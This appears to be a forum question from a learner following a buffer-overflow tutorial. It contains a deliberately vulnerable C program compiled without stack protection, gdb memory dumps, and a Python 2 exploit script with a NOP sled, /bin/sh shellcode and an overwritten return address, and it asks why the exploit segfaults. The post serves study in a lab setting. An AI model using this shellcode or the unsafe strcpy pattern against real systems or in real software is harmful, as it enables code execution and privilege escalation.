I'm following this tutorial https://samsclass.info/127/proj/lbuf1.htm
i have ASLR off and i'm using Python 2 btw
C Code:
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char buffer[100];
strcpy(buffer, argv[1]);
printf("Done\n");
}
compiled with: gcc -m32 -g -fno-stack-protector -z execstack -o buffer buffer.c
then i run it in gdb and add a break point at line 8 (printf("Done\n");
) then i type run A
and then
info registers
:
eax 0xffffd56c -10900
ecx 0xffffd896 -10090
edx 0xffffd56c -10900
ebx 0x56558fd4 1448447956
esp 0xffffd560 0xffffd560
ebp 0xffffd5d8 0xffffd5d8
esi 0xf7fa9000 -134574080
edi 0xf7fa9000 -134574080
eip 0x56556228 0x56556228 <main+59>
eflags 0x286 [ PF SF IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
then x/40x $esp
:
0xffffd560: 0x00000000 0x00c30000 0x00000001 0xf7ff0041 #Here's A
0xffffd570: 0x00000000 0x00000000 0x00005034 0xc725d900
0xffffd580: 0x029c6fbf 0x00000534 0x0000005e 0xf7fa7a80
0xffffd590: 0x00000000 0xf7fa9000 0xf7ffc7e0 0xf7facc68
0xffffd5a0: 0xf7fa9000 0xf7fe22f0 0x00000000 0xf7df6402
0xffffd5b0: 0xf7fa93fc 0x00000001 0x56558fd4 0x565562a3
0xffffd5c0: 0x00000002 0xffffd684 0xffffd690 0x56556271
0xffffd5d0: 0xffffd5f0 0x00000000 0x00000000 0xf7ddcee5
0xffffd5e0: 0xf7fa9000 0xf7fa9000 0x00000000 0xf7ddcee5
0xffffd5f0: 0x00000002 0xffffd684 0xffffd690 0xffffd614
I commented the line where A
is seen, since it works i make this python script:
#!/usr/bin/python2
nopsled = '\x90' * 64
shellcode = (
'\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2' +
'\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89' +
'\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80'
)
padding = '\x41' * (112 - 64 - 32)
eip = '\x10\xd5\xff\xff' #0xffffd510 is where the nop sled will be
print nopsled + shellcode + padding + eip
then i run ./nsled > t_nsled
, it works so then i get back into gdb, add break point at line 8 and then run run $(cat t_nsled)
, here is what i get:
Breakpoint 1, main (argc=<error reading variable: Cannot access memory at address 0x41414141>, argv=<error reading variable: Cannot access memory at address 0x41414145>) at buffer.c:8
8 printf("Done\n");
and then info registers
, here is what x/40x $esp
outputs:
0xffffd4f0: 0x00000000 0x00c30000 0x00000001 0x90909090
0xffffd500: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd510: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd520: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd530: 0x90909090 0x90909090 0x90909090 0xc389c031
0xffffd540: 0x80cd17b0 0x6852d231 0x68732f6e 0x622f2f68
0xffffd550: 0x52e38969 0x8de18953 0x80cd0b42 0x41414141
0xffffd560: 0x41414141 0x41414141 0x41414141 0xffffd510 #Return address to nopsled
0xffffd570: 0xf7fa9000 0xf7fa9000 0x00000000 0xf7ddcee5
0xffffd580: 0x00000002 0xffffd614 0xffffd620 0xffffd5a4
Then i type continue and get this
Continuing.
Done
Program received signal SIGSEGV, Segmentation fault.
0x56556248 in main (argc=<error reading variable: Cannot access memory at address 0x41414141>, argv=<error reading variable: Cannot access memory at address 0x41414145>) at buffer.c:9
9 }
Why isn't the shell code executed and why are the errors here? Even if i run it in the actual shell not in gdb i still just get a segmentation fault. Why?
User contributions licensed under CC BY-SA 3.0